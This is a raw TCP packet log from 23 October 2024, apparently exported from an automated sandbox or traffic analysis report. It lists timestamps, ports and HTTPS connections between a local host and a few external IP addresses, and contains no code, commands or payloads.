                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.324150085 CEST44349734141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.330827951 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.330847025 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.380757093 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.393960953 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394212008 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394284010 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394306898 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394406080 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394468069 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394479990 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394575119 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394630909 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.394643068 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.395478010 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.395558119 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.395570040 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.395663023 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.395720959 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.395733118 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.444181919 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.444196939 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.489281893 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.492958069 CEST4434972313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.493668079 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.494749069 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.508940935 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.510998964 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511209965 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511281013 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511296988 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511421919 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511478901 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511491060 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511691093 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511744976 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511756897 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511843920 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511898994 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.511910915 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.514986992 CEST4434972513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.535995960 CEST49723443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.535998106 CEST49722443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.537659883 CEST49724443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.551615953 CEST49726443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.551637888 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.567229986 CEST49725443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630496025 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630527020 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630605936 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630644083 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630692959 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630708933 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630760908 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630773067 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630844116 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630904913 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630918026 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.630966902 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.631508112 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.631551981 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.631577969 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.675606966 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746284962 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746368885 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746406078 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746556044 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746613026 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746628046 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746686935 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746839046 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746865988 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.746895075 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.747369051 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.747397900 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.747430086 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.747437000 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.747456074 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.794384956 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.799221039 CEST49725443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.799279928 CEST4434972513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.799539089 CEST49723443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.799554110 CEST4434972313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.799967051 CEST49725443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.800000906 CEST4434972513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.800005913 CEST49723443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.800009012 CEST4434972313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.800292969 CEST49726443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.800324917 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.800972939 CEST49726443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.800981045 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.801292896 CEST49722443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.801318884 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.802134037 CEST49722443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.802139044 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.802926064 CEST49724443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.802939892 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.803610086 CEST49724443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.803615093 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.863657951 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.863696098 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.863739967 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.863852978 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.863909960 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.863918066 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.863957882 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.864504099 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.864535093 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.864569902 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.865017891 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.865077019 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.865083933 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.865128040 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.924474955 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.924784899 CEST49727443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.924807072 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.925265074 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.925995111 CEST49727443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.926076889 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.926151991 CEST49727443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.930286884 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.930485010 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.930493116 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.930946112 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.931408882 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.931528091 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.931534052 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.931549072 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.932811975 CEST4434972313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.933048964 CEST4434972313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.933109999 CEST49723443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.933168888 CEST49723443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.933186054 CEST4434972313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.933196068 CEST49723443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.933202982 CEST4434972313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934123039 CEST44349730141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934425116 CEST49730443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934441090 CEST44349730141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934648991 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934705019 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934756994 CEST49724443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934772015 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934823036 CEST49724443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934830904 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934880972 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934927940 CEST49724443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934969902 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934984922 CEST49724443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.934997082 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935000896 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935019016 CEST49724443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935026884 CEST4434972413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935036898 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935045004 CEST49726443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935054064 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935066938 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935110092 CEST49726443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935177088 CEST49726443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935182095 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935194969 CEST49726443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935199976 CEST4434972613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935242891 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935292959 CEST49722443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935305119 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935347080 CEST49722443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935401917 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935444117 CEST49722443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935554981 CEST4434972513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935774088 CEST4434972513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935832024 CEST49725443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935924053 CEST44349730141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.935992002 CEST49730443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.936513901 CEST49725443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.936515093 CEST49725443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.936556101 CEST4434972513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.936582088 CEST4434972513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.937110901 CEST49722443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.937110901 CEST49722443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.937124968 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.937133074 CEST4434972213.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.938929081 CEST49730443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.939021111 CEST44349730141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.939330101 CEST49730443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.939347029 CEST44349730141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.939687967 CEST49736443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.939757109 CEST4434973613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.939843893 CEST49736443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.940337896 CEST49736443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.940370083 CEST4434973613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.942656040 CEST49737443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.942694902 CEST4434973713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.942750931 CEST49737443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.942862988 CEST49737443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.942872047 CEST4434973713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.943212986 CEST49738443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.943233013 CEST4434973813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.943296909 CEST49738443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.943770885 CEST49738443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.943794012 CEST4434973813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.944344997 CEST44349732141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.944966078 CEST49739443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.944977045 CEST4434973913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945027113 CEST49739443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945343971 CEST49739443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945355892 CEST4434973913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945533991 CEST49732443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945533991 CEST49740443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945543051 CEST44349732141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945564032 CEST4434974013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945619106 CEST49740443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945758104 CEST49740443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.945770979 CEST4434974013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.948754072 CEST44349734141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.949212074 CEST44349732141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.949274063 CEST49732443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.949855089 CEST49732443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.950028896 CEST44349732141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.950203896 CEST49734443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.950212002 CEST44349734141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.950337887 CEST49732443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.950345039 CEST44349732141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.951198101 CEST44349734141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.951281071 CEST49734443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.951904058 CEST49734443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.951960087 CEST44349734141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.952042103 CEST49734443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.952047110 CEST44349734141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.971337080 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.978023052 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980621099 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980757952 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980792046 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980827093 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980848074 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980875015 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980909109 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.980967045 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.981380939 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.981434107 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.981513977 CEST44349721141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.981578112 CEST49721443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.982090950 CEST49741443192.168.2.6142.250.186.68
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.982146025 CEST44349741142.250.186.68192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.982217073 CEST49741443192.168.2.6142.250.186.68
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.982631922 CEST49741443192.168.2.6142.250.186.68
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.982664108 CEST44349741142.250.186.68192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:00.988598108 CEST49730443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.004261971 CEST49732443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.004261971 CEST49734443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076441050 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076505899 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076566935 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076617956 CEST49727443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076646090 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076720953 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076761961 CEST49727443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076776981 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076831102 CEST49727443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.076845884 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.077172995 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.077219009 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.077228069 CEST49727443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.077244997 CEST44349727141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.077295065 CEST49727443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082674980 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082722902 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082747936 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082777023 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082782030 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082794905 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082844019 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082861900 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:01.082915068 CEST49728443192.168.2.6141.193.213.10
